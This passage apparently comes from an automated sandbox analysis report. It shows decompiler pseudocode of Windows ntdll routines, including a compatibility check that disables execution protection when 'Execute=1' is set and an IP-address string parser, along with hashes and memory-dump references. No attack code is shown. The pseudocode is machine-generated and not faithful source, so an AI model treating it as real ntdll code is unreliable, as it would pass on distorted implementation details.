                                                                                                                                                            					E009A3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                            					_t71 = 0x214;
                                                                                                                                                            					_v544 = 0x214;
                                                                                                                                                            					E0095DFC0( &_v540, 0, 0x214);
                                                                                                                                                            					_t75 = _t74 + 0x20;
                                                                                                                                                            					_t46 =  *0xa34218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                            					__eflags = _t46;
                                                                                                                                                            					if(_t46 == 0) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					_t47 = _v544;
                                                                                                                                                            					__eflags = _t47;
                                                                                                                                                            					if(_t47 == 0) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t47 - 0x214;
                                                                                                                                                            					if(_t47 >= 0x214) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					_push(_t62);
                                                                                                                                                            					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                            					E009A3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                            					_t52 = E00960D27( &_v540, L"Execute=1");
                                                                                                                                                            					_t76 = _t75 + 0x1c;
                                                                                                                                                            					_push(_t62);
                                                                                                                                                            					__eflags = _t52;
                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                            						E009A3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                            						_t71 =  &_v540;
                                                                                                                                                            						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                            						_t77 = _t76 + 0x14;
                                                                                                                                                            						_v552 = _t56;
                                                                                                                                                            						__eflags = _t71 - _t56;
                                                                                                                                                            						if(_t71 >= _t56) {
                                                                                                                                                            							goto L1;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						}
                                                                                                                                                            						while(1) {
                                                                                                                                                            							L10:
                                                                                                                                                            							_t62 = E00968375(_t71, 0x20);
                                                                                                                                                            							_pop(_t69);
                                                                                                                                                            							__eflags = _t62;
                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            								 *_t62 = 0;
                                                                                                                                                            							}
                                                                                                                                                            							E009A3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                            							_t77 = _t77 + 0x10;
                                                                                                                                                            							E009CE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                            							__eflags = _t62;
                                                                                                                                                            							if(_t62 == 0) {
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            							_t31 = _t62 + 2; // 0x2
                                                                                                                                                            							_t71 = _t31;
                                                                                                                                                            							__eflags = _t71 - _v552;
                                                                                                                                                            							if(_t71 >= _v552) {
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                            					_push(3);
                                                                                                                                                            					_push(0x55);
                                                                                                                                                            					E009A3F92();
                                                                                                                                                            					_t38 = 1;
                                                                                                                                                            					L2:
                                                                                                                                                            					return E0095E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                            				}
                                                                                                                                                            				L1:
                                                                                                                                                            				_t38 = 0;
                                                                                                                                                            				goto L2;
                                                                                                                                                            			}



























                                                                                                                                                            0x00987f08
                                                                                                                                                            0x00987f0f
                                                                                                                                                            0x00987f12
                                                                                                                                                            0x00987f1b
                                                                                                                                                            0x00987f31
                                                                                                                                                            0x009a3ead
                                                                                                                                                            0x009a3eb4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a3eba
                                                                                                                                                            0x009a3ecd
                                                                                                                                                            0x009a3ed2
                                                                                                                                                            0x009a3ee1
                                                                                                                                                            0x009a3ee7
                                                                                                                                                            0x009a3eec
                                                                                                                                                            0x009a3f12
                                                                                                                                                            0x009a3f18
                                                                                                                                                            0x009a3f1a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a3f20
                                                                                                                                                            0x009a3f26
                                                                                                                                                            0x009a3f28
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a3f2e
                                                                                                                                                            0x009a3f30
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a3f3a
                                                                                                                                                            0x009a3f3b
                                                                                                                                                            0x009a3f53
                                                                                                                                                            0x009a3f64
                                                                                                                                                            0x009a3f69
                                                                                                                                                            0x009a3f6c
                                                                                                                                                            0x009a3f6d
                                                                                                                                                            0x009a3f6f
                                                                                                                                                            0x009ae304
                                                                                                                                                            0x009ae30f
                                                                                                                                                            0x009ae315
                                                                                                                                                            0x009ae31e
                                                                                                                                                            0x009ae321
                                                                                                                                                            0x009ae327
                                                                                                                                                            0x009ae329
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009ae32f
                                                                                                                                                            0x009ae32f
                                                                                                                                                            0x009ae337
                                                                                                                                                            0x009ae33a
                                                                                                                                                            0x009ae33b
                                                                                                                                                            0x009ae33d
                                                                                                                                                            0x009ae33f
                                                                                                                                                            0x009ae341
                                                                                                                                                            0x009ae341
                                                                                                                                                            0x009ae34e
                                                                                                                                                            0x009ae353
                                                                                                                                                            0x009ae358
                                                                                                                                                            0x009ae35d
                                                                                                                                                            0x009ae35f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009ae365
                                                                                                                                                            0x009ae365
                                                                                                                                                            0x009ae368
                                                                                                                                                            0x009ae36e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009ae374
                                                                                                                                                            0x009ae32f
                                                                                                                                                            0x009a3f75
                                                                                                                                                            0x009a3f7a
                                                                                                                                                            0x009a3f7c
                                                                                                                                                            0x009a3f7e
                                                                                                                                                            0x009a3f86
                                                                                                                                                            0x00987f39
                                                                                                                                                            0x00987f47
                                                                                                                                                            0x00987f47
                                                                                                                                                            0x00987f37
                                                                                                                                                            0x00987f37
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 009A3F12
                                                                                                                                                            Strings
                                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 009A3F75
                                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 009AE2FB
                                                                                                                                                            • ExecuteOptions, xrefs: 009A3F04
                                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 009A3F4A
                                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 009AE345
                                                                                                                                                            • Execute=1, xrefs: 009A3F5E
                                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 009A3EC4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BaseDataModuleQuery
                                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                            • API String ID: 3901378454-484625025
                                                                                                                                                            • Opcode ID: e4baedfe0d445dcb49f32a7f1eb3de811c056506002522c1d49969b432d61f9e
                                                                                                                                                            • Instruction ID: ce0a10c7a9744ba75940762cdc5726fc3f7a872fae450d07c1f7de0a47803143
                                                                                                                                                            • Opcode Fuzzy Hash: e4baedfe0d445dcb49f32a7f1eb3de811c056506002522c1d49969b432d61f9e
                                                                                                                                                            • Instruction Fuzzy Hash: 9C41C831A4020C7ADF20EBD5DCC6FDAB3BCAB95705F1405A9B605A6181EA70EB458FA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00990B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				void* _t108;
                                                                                                                                                            				void* _t116;
                                                                                                                                                            				char _t120;
                                                                                                                                                            				short _t121;
                                                                                                                                                            				void* _t128;
                                                                                                                                                            				intOrPtr* _t130;
                                                                                                                                                            				char _t132;
                                                                                                                                                            				short _t133;
                                                                                                                                                            				intOrPtr _t141;
                                                                                                                                                            				signed int _t156;
                                                                                                                                                            				signed int _t174;
                                                                                                                                                            				intOrPtr _t177;
                                                                                                                                                            				intOrPtr* _t179;
                                                                                                                                                            				intOrPtr _t180;
                                                                                                                                                            				void* _t183;
                                                                                                                                                            
                                                                                                                                                            				_t179 = _a4;
                                                                                                                                                            				_t141 =  *_t179;
                                                                                                                                                            				_v16 = 0;
                                                                                                                                                            				_v28 = 0;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v24 = 0;
                                                                                                                                                            				_v12 = 0;
                                                                                                                                                            				_v32 = 0;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				if(_t141 == 0) {
                                                                                                                                                            					L41:
                                                                                                                                                            					 *_a8 = _t179;
                                                                                                                                                            					_t180 = _v24;
                                                                                                                                                            					if(_t180 != 0) {
                                                                                                                                                            						if(_t180 != 3) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						_v8 = _v8 + 1;
                                                                                                                                                            					}
                                                                                                                                                            					_t174 = _v32;
                                                                                                                                                            					if(_t174 == 0) {
                                                                                                                                                            						if(_v8 == 7) {
                                                                                                                                                            							goto L43;
                                                                                                                                                            						}
                                                                                                                                                            						goto L6;
                                                                                                                                                            					}
                                                                                                                                                            					L43:
                                                                                                                                                            					if(_v16 != 1) {
                                                                                                                                                            						if(_v16 != 2) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                            						L47:
                                                                                                                                                            						if(_t174 != 0) {
                                                                                                                                                            							E00968980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                            							_t116 = 8;
                                                                                                                                                            							E0095DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                            						}
                                                                                                                                                            						return 0;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t180 != 0) {
                                                                                                                                                            						if(_v12 > 3) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						_t120 = E00990CFA(_v28, 0, 0xa);
                                                                                                                                                            						_t183 = _t183 + 0xc;
                                                                                                                                                            						if(_t120 > 0xff) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                            						goto L47;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v12 > 4) {
                                                                                                                                                            						goto L6;
                                                                                                                                                            					}
                                                                                                                                                            					_t121 = E00990CFA(_v28, _t180, 0x10);
                                                                                                                                                            					_t183 = _t183 + 0xc;
                                                                                                                                                            					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                            					goto L47;
                                                                                                                                                            				} else {
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_t123 = _v16;
                                                                                                                                                            						if(_t123 == 0) {
                                                                                                                                                            							goto L7;
                                                                                                                                                            						}
                                                                                                                                                            						_t108 = _t123 - 1;
                                                                                                                                                            						if(_t108 != 0) {
                                                                                                                                                            							goto L1;
                                                                                                                                                            						}
                                                                                                                                                            						_t178 = _t141;
                                                                                                                                                            						if(E009906BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                            							if(E009906BA(_t135, _t178) == 0 || E00990A5B(_t136, _t178) == 0) {
                                                                                                                                                            								if(_t141 != 0x3a) {
                                                                                                                                                            									if(_t141 == 0x2e) {
                                                                                                                                                            										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                            											goto L41;
                                                                                                                                                            										} else {
                                                                                                                                                            											_v24 = _v24 + 1;
                                                                                                                                                            											L27:
                                                                                                                                                            											_v16 = _v16 & 0x00000000;
                                                                                                                                                            											L28:
                                                                                                                                                            											if(_v28 == 0) {
                                                                                                                                                            												goto L20;
                                                                                                                                                            											}
                                                                                                                                                            											_t177 = _v24;
                                                                                                                                                            											if(_t177 != 0) {
                                                                                                                                                            												if(_v12 > 3) {
                                                                                                                                                            													L6:
                                                                                                                                                            													return 0xc000000d;
                                                                                                                                                            												}
                                                                                                                                                            												_t132 = E00990CFA(_v28, 0, 0xa);
                                                                                                                                                            												_t183 = _t183 + 0xc;
                                                                                                                                                            												if(_t132 > 0xff) {
                                                                                                                                                            													goto L6;
                                                                                                                                                            												}
                                                                                                                                                            												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                            												goto L20;
                                                                                                                                                            											}
                                                                                                                                                            											if(_v12 > 4) {
                                                                                                                                                            												goto L6;
                                                                                                                                                            											}
                                                                                                                                                            											_t133 = E00990CFA(_v28, 0, 0x10);
                                                                                                                                                            											_t183 = _t183 + 0xc;
                                                                                                                                                            											_v20 = _v20 + 1;
                                                                                                                                                            											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                            											goto L20;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            									goto L41;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                            									goto L41;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t130 = _t179 + 1;
                                                                                                                                                            									if( *_t130 == _t141) {
                                                                                                                                                            										if(_v32 != 0) {
                                                                                                                                                            											goto L41;
                                                                                                                                                            										}
                                                                                                                                                            										_v32 = _v8 + 1;
                                                                                                                                                            										_t156 = 2;
                                                                                                                                                            										_v8 = _v8 + _t156;
                                                                                                                                                            										L34:
                                                                                                                                                            										_t179 = _t130;
                                                                                                                                                            										_v16 = _t156;
                                                                                                                                                            										goto L28;
                                                                                                                                                            									}
                                                                                                                                                            									_v8 = _v8 + 1;
                                                                                                                                                            									goto L27;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_v12 = _v12 + 1;
                                                                                                                                                            								if(_v24 > 0) {
                                                                                                                                                            									goto L41;
                                                                                                                                                            								}
                                                                                                                                                            								_a7 = 1;
                                                                                                                                                            								goto L20;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							_v12 = _v12 + 1;
                                                                                                                                                            							L20:
                                                                                                                                                            							_t179 = _t179 + 1;
                                                                                                                                                            							_t141 =  *_t179;
                                                                                                                                                            							if(_t141 == 0) {
                                                                                                                                                            								goto L41;
                                                                                                                                                            							}
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						L7:
                                                                                                                                                            						if(_t141 == 0x3a) {
                                                                                                                                                            							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                            								goto L41;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t130 = _t179 + 1;
                                                                                                                                                            								if( *_t130 != _t141) {
                                                                                                                                                            									goto L41;
                                                                                                                                                            								}
                                                                                                                                                            								_v20 = _v20 + 1;
                                                                                                                                                            								_t156 = 2;
                                                                                                                                                            								_v32 = 1;
                                                                                                                                                            								_v8 = _t156;
                                                                                                                                                            								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                            								goto L34;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L8:
                                                                                                                                                            						if(_v8 > 7) {
                                                                                                                                                            							goto L41;
                                                                                                                                                            						}
                                                                                                                                                            						_t142 = _t141;
                                                                                                                                                            						if(E009906BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                            							if(E009906BA(_t124, _t142) == 0 || E00990A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                            								goto L41;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t128 = 1;
                                                                                                                                                            								_a7 = 1;
                                                                                                                                                            								_v28 = _t179;
                                                                                                                                                            								_v16 = 1;
                                                                                                                                                            								_v12 = 1;
                                                                                                                                                            								L39:
                                                                                                                                                            								if(_v16 == _t128) {
                                                                                                                                                            									goto L20;
                                                                                                                                                            								}
                                                                                                                                                            								goto L28;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							_a7 = 0;
                                                                                                                                                            							_v28 = _t179;
                                                                                                                                                            							_v16 = 1;
                                                                                                                                                            							_v12 = 1;
                                                                                                                                                            							goto L20;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L1:
                                                                                                                                                            				_t123 = _t108 == 1;
                                                                                                                                                            				if(_t108 == 1) {
                                                                                                                                                            					goto L8;
                                                                                                                                                            				}
                                                                                                                                                            				_t128 = 1;
                                                                                                                                                            				goto L39;
                                                                                                                                                            			}

























                                                                                                                                                            0x00990b21
                                                                                                                                                            0x00990b24
                                                                                                                                                            0x00990b27
                                                                                                                                                            0x00990b2a
                                                                                                                                                            0x00990b2d
                                                                                                                                                            0x00990b30
                                                                                                                                                            0x00990b33
                                                                                                                                                            0x00990b36
                                                                                                                                                            0x00990b39
                                                                                                                                                            0x00990b3e
                                                                                                                                                            0x00990c65
                                                                                                                                                            0x00990c68
                                                                                                                                                            0x00990c6a
                                                                                                                                                            0x00990c6f
                                                                                                                                                            0x009beb42
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beb48
                                                                                                                                                            0x009beb48
                                                                                                                                                            0x00990c75
                                                                                                                                                            0x00990c7a
                                                                                                                                                            0x009beb54
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beb5a
                                                                                                                                                            0x00990c80
                                                                                                                                                            0x00990c84
                                                                                                                                                            0x009beb98
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beba6
                                                                                                                                                            0x00990cb8
                                                                                                                                                            0x00990cba
                                                                                                                                                            0x00990cd3
                                                                                                                                                            0x00990cda
                                                                                                                                                            0x00990ce4
                                                                                                                                                            0x00990ce9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990cec
                                                                                                                                                            0x00990c8c
                                                                                                                                                            0x009beb63
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beb70
                                                                                                                                                            0x009beb75
                                                                                                                                                            0x009beb7d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beb8c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beb8c
                                                                                                                                                            0x00990c96
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990ca2
                                                                                                                                                            0x00990cac
                                                                                                                                                            0x00990cb4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990b44
                                                                                                                                                            0x00990b47
                                                                                                                                                            0x00990b49
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990b4f
                                                                                                                                                            0x00990b50
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990b56
                                                                                                                                                            0x00990b62
                                                                                                                                                            0x00990b7c
                                                                                                                                                            0x00990bac
                                                                                                                                                            0x00990a0f
                                                                                                                                                            0x009beaaa
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beac4
                                                                                                                                                            0x009beac4
                                                                                                                                                            0x00990bd0
                                                                                                                                                            0x00990bd0
                                                                                                                                                            0x00990bd4
                                                                                                                                                            0x00990bd9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990bdb
                                                                                                                                                            0x00990be0
                                                                                                                                                            0x009beb0e
                                                                                                                                                            0x00990a1a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990a1a
                                                                                                                                                            0x009beb1a
                                                                                                                                                            0x009beb1f
                                                                                                                                                            0x009beb27
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beb36
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beb36
                                                                                                                                                            0x00990bea
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990bf6
                                                                                                                                                            0x00990c00
                                                                                                                                                            0x00990c03
                                                                                                                                                            0x00990c0b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990c0b
                                                                                                                                                            0x009beaaa
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990a15
                                                                                                                                                            0x00990bb6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990bc6
                                                                                                                                                            0x00990bc6
                                                                                                                                                            0x00990bcb
                                                                                                                                                            0x00990c15
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990c1d
                                                                                                                                                            0x00990c20
                                                                                                                                                            0x00990c21
                                                                                                                                                            0x00990c24
                                                                                                                                                            0x00990c24
                                                                                                                                                            0x00990c26
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990c26
                                                                                                                                                            0x00990bcd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990bcd
                                                                                                                                                            0x00990b89
                                                                                                                                                            0x00990b89
                                                                                                                                                            0x00990b90
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990b96
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990b96
                                                                                                                                                            0x00990a04
                                                                                                                                                            0x00990a04
                                                                                                                                                            0x00990b9a
                                                                                                                                                            0x00990b9a
                                                                                                                                                            0x00990b9b
                                                                                                                                                            0x00990b9f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990ba5
                                                                                                                                                            0x00990ac7
                                                                                                                                                            0x00990aca
                                                                                                                                                            0x009beacf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beade
                                                                                                                                                            0x009beade
                                                                                                                                                            0x009beae3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beaf3
                                                                                                                                                            0x009beaf6
                                                                                                                                                            0x009beaf7
                                                                                                                                                            0x009beafe
                                                                                                                                                            0x009beb01
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beb01
                                                                                                                                                            0x009beacf
                                                                                                                                                            0x00990ad0
                                                                                                                                                            0x00990ad4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990ada
                                                                                                                                                            0x00990ae6
                                                                                                                                                            0x00990c34
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990c47
                                                                                                                                                            0x00990c49
                                                                                                                                                            0x00990c4a
                                                                                                                                                            0x00990c4e
                                                                                                                                                            0x00990c51
                                                                                                                                                            0x00990c54
                                                                                                                                                            0x00990c57
                                                                                                                                                            0x00990c5a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990c60
                                                                                                                                                            0x00990afb
                                                                                                                                                            0x00990afe
                                                                                                                                                            0x00990b02
                                                                                                                                                            0x00990b05
                                                                                                                                                            0x00990b08
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990b08
                                                                                                                                                            0x00990ae6
                                                                                                                                                            0x00990b44
                                                                                                                                                            0x009909f8
                                                                                                                                                            0x009909f8
                                                                                                                                                            0x009909f9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beaa0
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __fassign
                                                                                                                                                            • String ID: .$:$:
                                                                                                                                                            • API String ID: 3965848254-2308638275
                                                                                                                                                            • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                            • Instruction ID: c25420ddcc75d8812b7bdb1aaf11f4dd9abdb8e5cf63485b3e237bc40a6d7170
                                                                                                                                                            • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                            • Instruction Fuzzy Hash: A6A1A071D0030ADFCF24CF5CC8497BEB7B8AF95315F24856AD8A2A7241E7349A81CB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                            			E00990554(signed int _a4, char _a8) {
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int* _t49;
                                                                                                                                                            				signed int _t51;
                                                                                                                                                            				signed int _t56;
                                                                                                                                                            				signed int _t58;
                                                                                                                                                            				signed int _t61;
                                                                                                                                                            				signed int _t63;
                                                                                                                                                            				void* _t66;
                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                            				void* _t69;
                                                                                                                                                            				signed int _t70;
                                                                                                                                                            				void* _t75;
                                                                                                                                                            				signed int _t81;
                                                                                                                                                            				signed int _t84;
                                                                                                                                                            				void* _t86;
                                                                                                                                                            				signed int _t93;
                                                                                                                                                            				signed int _t96;
                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                            				signed int _t107;
                                                                                                                                                            				void* _t110;
                                                                                                                                                            				signed int _t115;
                                                                                                                                                            				signed int* _t119;
                                                                                                                                                            				void* _t125;
                                                                                                                                                            				void* _t126;
                                                                                                                                                            				signed int _t128;
                                                                                                                                                            				signed int _t130;
                                                                                                                                                            				signed int _t138;
                                                                                                                                                            				signed int _t144;
                                                                                                                                                            				void* _t158;
                                                                                                                                                            				void* _t159;
                                                                                                                                                            				void* _t160;
                                                                                                                                                            
                                                                                                                                                            				_t96 = _a4;
                                                                                                                                                            				_t115 =  *(_t96 + 0x28);
                                                                                                                                                            				_push(_t138);
                                                                                                                                                            				if(_t115 < 0) {
                                                                                                                                                            					_t105 =  *[fs:0x18];
                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                            					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                            						goto L6;
                                                                                                                                                            					} else {
                                                                                                                                                            						__eflags = _t115 | 0xffffffff;
                                                                                                                                                            						asm("lock xadd [eax], edx");
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					L6:
                                                                                                                                                            					_push(_t128);
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L7:
                                                                                                                                                            						__eflags = _t115;
